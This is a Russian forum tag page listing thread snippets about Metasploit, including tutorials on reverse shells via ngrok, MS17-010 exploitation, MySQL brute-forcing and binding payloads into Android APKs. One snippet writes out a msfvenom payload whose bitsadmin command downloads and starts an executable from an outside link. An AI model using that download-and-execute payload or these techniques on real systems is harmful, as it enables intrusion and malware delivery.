metasploit
Всё по теме «metasploit» на форуме Codeby.net. Обсуждений: 169. Разборы, инструменты и практика по информационной безопасности.
-
B
Статья Списки слов для атаки по словарю: пароли, имена пользователей, каталоги
Далеко не всё программное обеспечение содержит эксплуатируемые уязвимости (как этого хотелось бы некоторым). Но цепь, как известно, рвётся на самом слабом звене. И нам не важно, насколько сильны остальные звенья, если мы найдём слабое. Очень часто слабым звеном является человек. Именно поэтому...- BKeaton
- Тема
- dirb kali linux medusa patator router scan by stas'm аудит безопасности взлом пароли
- Ответы: 1
- Раздел: Мои статьи
-
B
Статья Как запустить Metasploit Framework в Kali Linux
Для запуска Metasploit Framework в Kali 2.0 смотрите здесь. Чтобы соответствовать Политике Сетевых Служб (Network Services Policy) Kali Linux, при загрузке отсутствуют сетевые службы, включая службы базы данных, поэтому нужно сделать пару шагов чтобы запустить Metasploit с поддержкой базы...- BKeaton
- Тема
- kali linux linux postgresql сканеры уязвимостей
- Ответы: 4
- Раздел: Мои статьи
-
B
Статья Metasploit Exploitation Framework и searchsploit — как искать и как использовать эксплойты
Metasploit Exploitation Framework — это инструмент для тестирования на проникновение. Он содержит большую базу эксплойтов, позволяет использовать их прямо из Metasploit. Существует две версии Metasploit, в этом уроке я рассматриваю бесплатную версию. searchsploit — это инструмент для поиска...- BKeaton
- Тема
- kali linux nmap searchsploit сканеры уязвимостей эксплойты
- Ответы: 2
- Раздел: Мои статьи
-
F
Склейка Metasploit payload с apk
Доброго времени суток всем! На днях поставил Metasploit в Termux. При попытке добавить payload в уже существующий apk Metasploit пожаловался на отсутствие Zipalign. Нашёл много разных версий, но под aarch64 не было не одной. Буду благодарен за помощь в решении данного вопроса.- Freeze Gamer
- Тема
- aarch64 android msfvenom payload termux zipalign
- Ответы: 1
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
F
Как использовать команду "write"
Я недавно стал пользоваться termux и metasploit в целом. Мне интересно, что делает команда "write" и как её использовать?- Fagol
- Тема
- termux
- Ответы: 4
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
N
Metasploit: как передать кириллицу на атакуемый хост
Всем привет! Эксплуатирую уязвимость MS17-010 на Windows XP SP3 RU через метасплоит, модуль Command Execution, остальные завершаются с ошибкой. Создал нового пользователя, активировал на целевом хосте РДП, но не могу добавить пользователя в группу "Администраторы". Путём проб понял, что...- nenser
- Тема
- charset ms17-010
- Ответы: 5
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
MSF mysql login
Всем добрейшего дня. Столкнулся с проблемкой,нашел сервер mysql,версия 5.5.6.2,после попыток Брута через модуль mysql_login после 100-150 попыток,на время банится айпиха. Пробовал вручную на кали включать прокси,но так же банится почему то моя айпиха,а не та которая через прокси. В данном модуле...- Rook
- Тема
- auxiliary brute login mysql
- Ответы: 1
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
D
Статья Анализ безопасности macOS: создание уязвимых точек доступа через терминал и Kali Linux
Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники...- Default
- Тема
- hack hack mac kali kali linux mac os mac os x macos безопасность кибербезопасность системный анализ терминал уязвимости
- Ответы: 5
- Раздел: Мои статьи
-
Kage - графический метасплоит.
Приветствую читателей codeby.net! Сегодня хотелось бы обратить внимание на один интересный проект, созданный для облегчения пользования Metasploit, а именно сеансами meterpreter и не только. И так, "Kage" - инструмент, представляющий собой графический интерфейс пользователя для "Metasploit...- timmy
- Тема
- kage timmy
- Ответы: 6
- Раздел: Арсенал специалиста по ИБ
-
Metasploit + NGRok kali linux
Всем привет! Нужна помощь с разбором проблемы в комбинации metasploit с ngrok в kali linux. Сессия meterpreter не саздаёться, пробовал разные способы, искал решение в интернете но не нашёл. Можете написать как правильно создать ссесию meterpreter через openweb.- Sp0ge
- Тема
- help msf console ngrock openweb pc hack problem
- Ответы: 7
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
M
Проблема Добавить exploit в metasploit
Здравствуйте, хотел бы узнать, как добавить exploit в metasploit. Пытался добавить через /root/.mfs4/modules/exploit/remote но не видит. Как например данный эксплотит добавить в metasploit ? На форуме ничего не нашел- mixafighter
- Тема
- exploit
- Ответы: 1
- Раздел: Этичный хакинг и тестирование на проникновение
-
M
msfconsole > sh: 0: getcwd() failed: No such file or directory
Здравствуйте. Столкнулся впервые с такой проблемой sh: 0: getcwd() failed: No such file or directory sh: 0: getcwd() failed: No such file or directory [!] There was an error parsing `Gemfile`: No such file or directory - getcwd. Bundler cannot continue. # from...- MrBa
- Тема
- getcwd() msfconsole
- Ответы: 1
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья Установка Metasploit-Framework на Android-устройство [NO ROOT]
upd 04.08.2021 - метод больше не работает тема закрыта Привет, сегодня я расскажу про установку Metasploit-Framework на твое Android-устройство. На сегодняшний день, Metasploit является одним из лучших инструментов пентеста. В нем собранно несколько тысяч эксплоитов и не только. С его помощью...- v1ri0us
- Тема
- android termux
- Ответы: 63
- Раздел: Мои статьи
-
Статья Использование Metasploit для аудита безопасности информационных систем
В предыдущей статье из серии профессиональных инструментов для аудита безопасности, мы загрузили и установили Metasploit. Теперь, мы начнем адаптироваться к Metasploit Framework и будем делать маленькие шаги чтобы инициировать наш первый настоящий взлом. Прежде чем мы начнем аудит безопасности...- Сергей Попов
- Тема
- hack аудит безопасности взлом информационные системы кибербезопасность тестирование на проникновение уязвимости хакинг
- Ответы: 18
- Раздел: Мои статьи
-
F
Android бесступенчатый reverse tcp
Всем привет, я уже не первую неделю борюсь с проблемой обфускации смали кода reverse tcp и именно бесступенчатого реверса. В Evil-Droid есть вариант создания бесступенчатого реверса и его обфускации, но по каким то причинам это не работает (подозреваю что из за обновления метасплоита), так вот...- fakecop
- Тема
- android meterpreteer
- Ответы: 15
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья Атака через фейковое обновление: разбираем MITM на классическом примере
Привет, codeby.net! Эта статья посвящена теме, которая давно не дает мне покоя, — фейковым обновлениям ПО. Меня в целом захватывает мир атак типа Man-in-the-Middle (MITM), особенно их реализация внутри локальной сети. И подмена обновлений — один из самых коварных векторов. Года полтора назад я...- n3d.b0y
- Тема
- dns spoofing evilgrade man-in-the-middle mitm n3d.b0y notepad++ pentest wireshark xampp атака посредника кибербезопасность пентест перехват трафика фейковое обновление
- Ответы: 10
- Раздел: Сетевая безопасность и беспроводные атаки
-
Верная команда для windows/64/exec
Всем доброго времени, при генерирование нагрузки в msfvenom , пэйлоадом windows/x64/exec с параметрами cmd="bitsadmin /transfer myjob /download /priority high https://mylink.com c:\myfile.exe&start myfile.exe" -f exe -o file.exe, при запуске на windows 10 x64, на доли секунды открывается окошко...- Lisenok
- Тема
- msfvenom windows/64/exec windows/exec
- Ответы: 0
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья Metasploit + Ngrok: быстрый reverse shell без порт‑форвардинга (гайд 2025)
Открыть обратную шелл-сессию через NAT за 3 минуты — без единого проброшенного порта. Реально? Да! Берём Metasploit + Ngrok и показываем, как именно… Привет, codeby.net! В этом гайде покажу, как за пару минут поднять reverse shell на Windows (или любой другой ОС) через тандем Metasploit +...- n3d.b0y
- Тема
- cybersecurity n3d.b0y nat_bypass ngrok payload pentest reverse_shell tutorial windows
- Ответы: 38
- Раздел: Мои статьи
-
Ищу друзей на Дальнем Востоке (Хабаровск,Владивосток)
Всем привет! Имею огромное желание найти друзей в сфере ИБ и пентеста. Я верю что нужно оружать себя правильными друзьями с такими же целями и мечтами как у тебя . Если ты с ДВ - отзовись :)- FlowLight
- Тема
- friends pentest
- Ответы: 11
- Раздел: Общение и нетворкинг
-
M
Проблема auxiliary(scanner/http/crawler)
Приветствую всех форумчан! Есть вопрос по поводу метасплоита, а именно. Использую модуль auxiliary(scanner/http/crawler) Как только сайт на https - отказывается сканить. Все установки указываю как положено, порт и SSL. Http работает отлично. В чем может быть проблема?- MrBa
- Тема
- crawler https scaner ssl
- Ответы: 6
- Раздел: Этичный хакинг и тестирование на проникновение